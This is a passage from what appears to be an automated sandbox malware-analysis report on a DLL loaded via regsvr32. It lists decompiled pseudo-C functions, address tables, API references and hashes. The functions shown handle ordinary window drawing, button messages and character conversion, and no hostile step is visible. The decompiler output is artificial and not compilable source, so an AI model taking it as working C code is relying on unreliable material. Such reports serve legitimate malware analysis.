							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E10024D04(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}





















                                                                                                                0x10039b18
                                                                                                                0x10039b1a
                                                                                                                0x10039b1d
                                                                                                                0x10039b26
                                                                                                                0x10039b2c
                                                                                                                0x10039b2e
                                                                                                                0x10039b36
                                                                                                                0x10039b39
                                                                                                                0x10039b3c
                                                                                                                0x10039b46
                                                                                                                0x10039b4d
                                                                                                                0x10039b51
                                                                                                                0x10039b65
                                                                                                                0x10039b6b
                                                                                                                0x10039b6e
                                                                                                                0x10039b71
                                                                                                                0x10039b73
                                                                                                                0x10039b7b
                                                                                                                0x10039b7b
                                                                                                                0x10039b7f
                                                                                                                0x10039b8c
                                                                                                                0x10039b81
                                                                                                                0x10039b81
                                                                                                                0x10039b85
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039b85
                                                                                                                0x10039b75
                                                                                                                0x10039b75
                                                                                                                0x10039b79
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10039b79
                                                                                                                0x10039b92
                                                                                                                0x10039b53
                                                                                                                0x10039b53
                                                                                                                0x10039b48
                                                                                                                0x10039b48
                                                                                                                0x10039b98
                                                                                                                0x10039b99
                                                                                                                0x10039b9a
                                                                                                                0x10039b9b
                                                                                                                0x10039ba1
                                                                                                                0x10039ba3
                                                                                                                0x10039ba6
                                                                                                                0x10039ba6
                                                                                                                0x10039baf
                                                                                                                0x10039bb9
                                                                                                                0x10039bb9
                                                                                                                0x10039bbf
                                                                                                                0x10039bc2
                                                                                                                0x10039bc5
                                                                                                                0x10039bc7
                                                                                                                0x10039bc7
                                                                                                                0x10039be8
                                                                                                                0x10039bf6
                                                                                                                0x10039bf7
                                                                                                                0x10039bfd
                                                                                                                0x10039bfe
                                                                                                                0x10039c06
                                                                                                                0x10039c07
                                                                                                                0x10039c0a
                                                                                                                0x10039c0d
                                                                                                                0x10039c12

                                                                                                                APIs
                                                                                                                • GetStockObject.GDI32(00000000), ref: 10039B20
                                                                                                                  • Part of subcall function 10024C61: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 10024CA7
                                                                                                                  • Part of subcall function 10024C61: CreatePatternBrush.GDI32(00000000), ref: 10024CB4
                                                                                                                  • Part of subcall function 10024C61: DeleteObject.GDI32(00000000), ref: 10024CC0
                                                                                                                • InflateRect.USER32 ref: 10039BB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3923860780-0
                                                                                                                • Opcode ID: b234f663d67296b1003cf7fbfcae3b0a85e960eb97e1173000168dbcbf509421
                                                                                                                • Instruction ID: 6df2a3144f549944751206a5f7481f85cb7bf6598b357e5fb5926b41f58c0568
                                                                                                                • Opcode Fuzzy Hash: b234f663d67296b1003cf7fbfcae3b0a85e960eb97e1173000168dbcbf509421
                                                                                                                • Instruction Fuzzy Hash: 43412771D00219DFDF42CFA8DA80A9EB7F5EF48351F1146A6ED10AB285D771AE41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001D72E Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1001D72E(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1002E183( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E100182A6( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E100182A6( &_a4)));
								_v8 =  *((intOrPtr*)(E100182A6( &_a4)));
								if((E1001D44A(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1001D535( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1001D535( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1001D44A(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                                                                0x1001d731
                                                                                                                0x1001d732
                                                                                                                0x1001d735
                                                                                                                0x1001d73c
                                                                                                                0x1001d742
                                                                                                                0x1001d747
                                                                                                                0x1001d757
                                                                                                                0x1001d770
                                                                                                                0x1001d778
                                                                                                                0x1001d780
                                                                                                                0x1001d783
                                                                                                                0x1001d78d
                                                                                                                0x1001d7ce
                                                                                                                0x1001d7a3
                                                                                                                0x1001d7a7
                                                                                                                0x1001d7b4
                                                                                                                0x00000000
                                                                                                                0x1001d7b6
                                                                                                                0x1001d7b6
                                                                                                                0x1001d7bc
                                                                                                                0x00000000
                                                                                                                0x1001d829
                                                                                                                0x1001d829
                                                                                                                0x1001d829
                                                                                                                0x00000000
                                                                                                                0x1001d829
                                                                                                                0x1001d7bc
                                                                                                                0x00000000
                                                                                                                0x1001d7b4
                                                                                                                0x1001d7d9
                                                                                                                0x1001d7e3
                                                                                                                0x1001d822
                                                                                                                0x1001d7f9
                                                                                                                0x1001d7fe
                                                                                                                0x1001d801
                                                                                                                0x1001d816
                                                                                                                0x1001d816
                                                                                                                0x1001d820
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001d803
                                                                                                                0x1001d811
                                                                                                                0x00000000
                                                                                                                0x1001d813
                                                                                                                0x1001d813
                                                                                                                0x00000000
                                                                                                                0x1001d813
                                                                                                                0x1001d811
                                                                                                                0x00000000
                                                                                                                0x1001d801
                                                                                                                0x1001d759
                                                                                                                0x1001d762
                                                                                                                0x1001d767
                                                                                                                0x1001d76a
                                                                                                                0x1001d82c
                                                                                                                0x1001d835
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001d76a
                                                                                                                0x1001d837
                                                                                                                0x1001d837
                                                                                                                0x1001d747
                                                                                                                0x1001d83b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 0b67bc060d87b7afd963845cf947f9e7fbc9eb519e38dc72100a594d7b494ab9
                                                                                                                • Instruction ID: bce9a119d42f123f64b4935fa0f80d8b17d978cfcd7e48ab87300b2a9d621cc8
                                                                                                                • Opcode Fuzzy Hash: 0b67bc060d87b7afd963845cf947f9e7fbc9eb519e38dc72100a594d7b494ab9
                                                                                                                • Instruction Fuzzy Hash: 74314974940119BBDB25FF51C891EAA3BA9EF417D4F10806BF9059F251DA30EDC0DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004D43C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004D43C(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1003B686( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1004C8A8( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1003D47E(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                                0x1004d444
                                                                                                                0x1004d44b
                                                                                                                0x1004d460
                                                                                                                0x00000000
                                                                                                                0x1004d452
                                                                                                                0x1004d454
                                                                                                                0x1004d46c
                                                                                                                0x1004d471
                                                                                                                0x1004d474
                                                                                                                0x1004d477
                                                                                                                0x1004d4a0
                                                                                                                0x1004d4a5
                                                                                                                0x1004d4a9
                                                                                                                0x1004d52a
                                                                                                                0x1004d53c
                                                                                                                0x1004d545
                                                                                                                0x1004d547
                                                                                                                0x1004d487
                                                                                                                0x1004d487
                                                                                                                0x1004d48a
                                                                                                                0x1004d48c
                                                                                                                0x1004d48f
                                                                                                                0x1004d48f
                                                                                                                0x1004d48f
                                                                                                                0x1004d48f
                                                                                                                0x00000000
                                                                                                                0x1004d495
                                                                                                                0x1004d509
                                                                                                                0x1004d509
                                                                                                                0x1004d50e
                                                                                                                0x1004d514
                                                                                                                0x1004d517
                                                                                                                0x1004d519
                                                                                                                0x1004d51c
                                                                                                                0x1004d51c
                                                                                                                0x1004d51c
                                                                                                                0x1004d51c
                                                                                                                0x00000000
                                                                                                                0x1004d520
                                                                                                                0x1004d4ab
                                                                                                                0x1004d4ae
                                                                                                                0x1004d4ae
                                                                                                                0x1004d4b4
                                                                                                                0x1004d4b7
                                                                                                                0x1004d4de
                                                                                                                0x1004d4e1
                                                                                                                0x1004d4e1
                                                                                                                0x1004d4e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004d4e9
                                                                                                                0x1004d4ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004d4ee
                                                                                                                0x1004d4ee
                                                                                                                0x1004d4f1
                                                                                                                0x1004d4f1
                                                                                                                0x1004d4f7
                                                                                                                0x1004d465
                                                                                                                0x1004d465
                                                                                                                0x1004d500
                                                                                                                0x00000000
                                                                                                                0x1004d500
                                                                                                                0x1004d4b9
                                                                                                                0x1004d4bc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004d4c0
                                                                                                                0x1004d4ce
                                                                                                                0x1004d4d1
                                                                                                                0x1004d4d7
                                                                                                                0x1004d4d9
                                                                                                                0x1004d4dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004d4dc
                                                                                                                0x1004d479
                                                                                                                0x1004d47c
                                                                                                                0x1004d47e
                                                                                                                0x1004d484
                                                                                                                0x1004d484
                                                                                                                0x00000000
                                                                                                                0x1004d456
                                                                                                                0x1004d456
                                                                                                                0x1004d45b
                                                                                                                0x1004d45d
                                                                                                                0x1004d45d
                                                                                                                0x00000000
                                                                                                                0x1004d45b
                                                                                                                0x1004d454

                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1004D46C
                                                                                                                • __isleadbyte_l.LIBCMT ref: 1004D4A0
                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000001,?,00000001,1004AD5F,?,?,00000002), ref: 1004D4D1
                                                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000001,?,00000001,1004AD5F,?,?,00000002), ref: 1004D53F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: ecd38a48816dd1547809e35aa429d4090e2840372f62fd982b930bf1c77b91ba
                                                                                                                • Instruction ID: f5b10cb50f36dbbb41a25a14adddc36c1dd2c7057b1d05655d8c5715ad1880fb
                                                                                                                • Opcode Fuzzy Hash: ecd38a48816dd1547809e35aa429d4090e2840372f62fd982b930bf1c77b91ba
                                                                                                                • Instruction Fuzzy Hash: FC31B031A0024AEFDB11EFA4C8849AE3BE5FF42251F2685BAE451DB1A1E730ED40DB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10030C04 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10030C04(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E1003D1E6(E100545B2, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x1005bb60;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E100231D3(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E1001729E(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E10024520(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E100247F5(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E100242EC( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E10022A6E();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x100572c4;
						E10024848(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E10022A6E();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x100572c4;
					E10024848(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E1003D2BE(_t53);
			}













                                                                                                                0x10030c04
                                                                                                                0x10030c04
                                                                                                                0x10030c0b
                                                                                                                0x10030c10
                                                                                                                0x10030c12
                                                                                                                0x10030c15
                                                                                                                0x10030c1c
                                                                                                                0x10030c25
                                                                                                                0x10030c28
                                                                                                                0x10030c2b
                                                                                                                0x10030c30
                                                                                                                0x10030c35
                                                                                                                0x10030c3a
                                                                                                                0x10030c3e
                                                                                                                0x10030c40
                                                                                                                0x10030c42
                                                                                                                0x10030c42
                                                                                                                0x10030c47
                                                                                                                0x10030c4c
                                                                                                                0x10030c8f
                                                                                                                0x10030c90
                                                                                                                0x10030c95
                                                                                                                0x10030c97
                                                                                                                0x10030c9a
                                                                                                                0x00000000
                                                                                                                0x10030c9c
                                                                                                                0x10030c9c
                                                                                                                0x10030c9f
                                                                                                                0x10030cc3
                                                                                                                0x10030ca1
                                                                                                                0x10030caa
                                                                                                                0x10030cab
                                                                                                                0x10030cac
                                                                                                                0x10030cad
                                                                                                                0x10030cae
                                                                                                                0x10030cb1
                                                                                                                0x10030cb1
                                                                                                                0x10030cd7
                                                                                                                0x10030ce5
                                                                                                                0x10030cea
                                                                                                                0x10030ced
                                                                                                                0x10030cef
                                                                                                                0x10030cf5
                                                                                                                0x10030cf1
                                                                                                                0x10030cf1
                                                                                                                0x10030cf1
                                                                                                                0x10030cf8
                                                                                                                0x10030cfb
                                                                                                                0x10030cfd
                                                                                                                0x10030d01
                                                                                                                0x10030d03
                                                                                                                0x10030d06
                                                                                                                0x10030d07
                                                                                                                0x10030d07
                                                                                                                0x10030d0c
                                                                                                                0x10030d13
                                                                                                                0x10030d1a
                                                                                                                0x10030d1f
                                                                                                                0x10030d1f
                                                                                                                0x10030d1f
                                                                                                                0x10030c4e
                                                                                                                0x10030c4e
                                                                                                                0x10030c51
                                                                                                                0x10030c55
                                                                                                                0x10030c57
                                                                                                                0x10030c5a
                                                                                                                0x10030c5b
                                                                                                                0x10030c5b
                                                                                                                0x10030c60
                                                                                                                0x10030c67
                                                                                                                0x10030c6e
                                                                                                                0x10030c73
                                                                                                                0x10030c73
                                                                                                                0x10030d26

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10030C0B
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetDC.USER32(?), ref: 10030C89
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 10030CC3
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 10030CCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2872313494-0
                                                                                                                • Opcode ID: d40ffe5e57ff589968931c0e7febde9010e709559e773ddb4ea559703d51cb4a
                                                                                                                • Instruction ID: c2919768b431c96dfd77b3d7ef37b00928705a951f8546859b09235c5aa3cb2f
                                                                                                                • Opcode Fuzzy Hash: d40ffe5e57ff589968931c0e7febde9010e709559e773ddb4ea559703d51cb4a
                                                                                                                • Instruction Fuzzy Hash: 4F318B35D0122ADFCF02CFE4D885A9EBBB8FF08300F518155F905AB191CB70AA44CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002DF03 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002DF03(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E100231BA(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E10023187(_t51, _t65, 0, _t77) + 4));
					_t70 = E1002D1A1(0x10070af4);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1004156B(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E1003B59D(_t51, _t66, _t70, _t83);
								}
								_t37 = E1003B4DA(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1003B4DA(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1004156B(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E10023206();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                                                                                                                0x1002df03
                                                                                                                0x1002df03
                                                                                                                0x1002df0d
                                                                                                                0x1002df0f
                                                                                                                0x1002df16
                                                                                                                0x1002dfee
                                                                                                                0x1002dff9
                                                                                                                0x1002dff9
                                                                                                                0x1002df1c
                                                                                                                0x1002df1f
                                                                                                                0x1002df22
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002df2b
                                                                                                                0x1002df6f
                                                                                                                0x1002df6f
                                                                                                                0x1002df75
                                                                                                                0x1002df82
                                                                                                                0x1002df86
                                                                                                                0x1002dfed
                                                                                                                0x00000000
                                                                                                                0x1002df8c
                                                                                                                0x1002df8c
                                                                                                                0x1002df8f
                                                                                                                0x1002df91
                                                                                                                0x1002dfa2
                                                                                                                0x1002dfa9
                                                                                                                0x1002dfab
                                                                                                                0x1002dfae
                                                                                                                0x1002dfb2
                                                                                                                0x1002dfb4
                                                                                                                0x1002dfb6
                                                                                                                0x1002dfb7
                                                                                                                0x1002dfbc
                                                                                                                0x1002dfbf
                                                                                                                0x1002dfc2
                                                                                                                0x1002dfc8
                                                                                                                0x1002dfcf
                                                                                                                0x1002dfd7
                                                                                                                0x1002dfda
                                                                                                                0x1002dfea
                                                                                                                0x1002dfea
                                                                                                                0x1002dfda
                                                                                                                0x00000000
                                                                                                                0x1002dfa9
                                                                                                                0x1002df93
                                                                                                                0x1002dfa0
                                                                                                                0x00000000
                                                                                                                0x00000000
